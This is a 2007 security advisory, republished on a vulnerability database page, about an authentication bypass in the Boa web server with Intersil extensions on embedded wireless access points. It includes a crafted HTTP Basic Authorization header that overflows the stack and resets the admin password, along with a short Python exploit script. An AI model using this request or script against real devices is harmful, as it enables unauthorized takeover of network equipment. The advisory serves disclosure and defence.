Boa (with Intersil Extensions) - HTTP Basic Authentication Bypass

2007.09.19
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Secure Network - Security Research Advisory Vuln name: HTTP Basic Authentication Bypass Systems affected: Boa/0.93.15 (with Intersil Extensions) based systems (i.e. FreeLan 802.11g Wireless Access Point (RO80211G-AP)) Severity: High Local/Remote: Remote Vendor URL: http://www.boa.org - http://isl3893.sourceforge.net - http://www.roper-europe.com Author(s): Luca "ikki" Carettoni - luca.carettoni (at) securenetwork (dot) it [email concealed], Claudio "paper" Merloni - claudio.merloni (at) securenetwork (dot) it [email concealed] Vendor disclosure: 24th August 2007 Vendor acknowledged: - Vendor patch release: - Public disclosure: 10th September 2007 Advisory number: SN-2007-02 Advisory URL: http://www.securenetwork.it/advisories/ *** SUMMARY *** Boa is a single-tasking HTTP server. That means that, unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections. Boa is very low on hardware usage and is therefore used on many embedded systems, including routers, wireless access points and portable devices. The Intersil isl3893 is an arm9 System On Chip for wireless access points. The goal of the project is to make an embedded distribution built around uclibc and uclinux. It is possible to overwrite the "admin" password in memory, thus allowing an attacker to gain access to the web interface and alter configuration parameters. This vulnerability can be combined with another known vulnerability (CVE-2000-0920) to read arbitrary files from the device filesystem. It's important to notice that Boa httpd doesn't have any authentication code built in; the flaw is inside the Intersil extensions but we can't confirm it because no source code is released. *** VULNERABILITY DETAILS *** When asked for HTTP basic authentication credentials, it is possible to fill up the stack memory of the boa process passing a string longer than 127 characters as username. In that situation the string passed as password will overwrite the current in memory value of the admin password, thus enabling the attacker to reset it to a known value. Once reset the password, the attacker has of course access to the configuration panel. As an example, the password can be set to "owned" sending the following request to the web server: GET / HTTP/1.1 Host: 192.168.0.1 Authorization: Basic YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh YWFhYWFhYWFhYWFhYWFhYWFhYTpvd25lZA== The basic authorization header parameter contains the base64/mime encoded string "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:owned" *** EXPLOIT *** The vulnerability can exploited through simple HTTP request, i.e. using a common web browser (using the authentication credential specified above). The following snippet of python code can be used to reproduce the issue: ###### CUT HERE ###### #!/usr/bin/env python import urllib2 SERVER_IP_ADDRESS = '192.168.0.1' USERNAME = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' NEW_PASSWORD = 'owned' auth_handler = urllib2.HTTPBasicAuthHandler() auth_handler.add_password('LOGIN(default username & password is admin)', SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD); opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml') ###### CUT HERE ###### *** FIX INFORMATION *** N/A *** WORKAROUNDS *** N/A ********************* *** LEGAL NOTICES *** ********************* Secure Network (www.securenetwork.it) is an information security company, which provides consulting and training services, and engages in security research and development. We are committed to open, full disclosure of vulnerabilities, cooperating with software developers for properly handling disclosure issues. This advisory is copyright ? 2007 Secure Network S.r.l. Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. It may not be edited in any way without the express consent of Secure Network S.r.l. Permission is explicitly given for insertion in vulnerability databases and similars, provided that due credit is given to Secure Network The information in the advisory is believed to be accurate at the time of publishing based on currently available information. This information is provided as-is, as a free service to the community by Secure Network research staff. There are no warranties with regard to this information. Secure Network does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. If you have any comments or inquiries, or any issue with what is reported in this advisory, please inform us as soon as possible. E-mail: securenetwork (at) securenetwork (dot) it [email concealed] GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc Phone: +39 0363 560 404


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top